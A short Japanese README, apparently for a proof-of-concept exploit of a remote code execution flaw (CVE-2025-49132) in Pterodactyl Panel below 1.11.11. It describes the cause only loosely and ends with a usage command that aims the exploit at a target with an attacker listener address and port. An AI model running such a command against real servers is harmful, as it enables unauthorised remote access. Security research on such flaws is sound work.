
このスクリプトは、Pterodactyl Panel < 1.11.11 におけるリモートコード実行の脆弱性を悪用します。
このリポジトリは、Pterodactyl Panel < 1.11.11 に影響を与えるリモートコード実行(RCE)脆弱性 CVE-2025-49132 の概念実証(PoC)を含んでいます。 このPoCは、研究および教育目的のために管理されたラボ環境で開発・テストされました。
この脆弱性は、リクエストハンドラにおけるユーザー制御入力の検証不十分に起因し、意図しないバックエンド操作を可能にします。 特定の条件下では、これによりリモートコマンド実行が引き起こされる可能性があります。
python3 exploit.py -t <target> -l <listener_ip> -p <listener_port>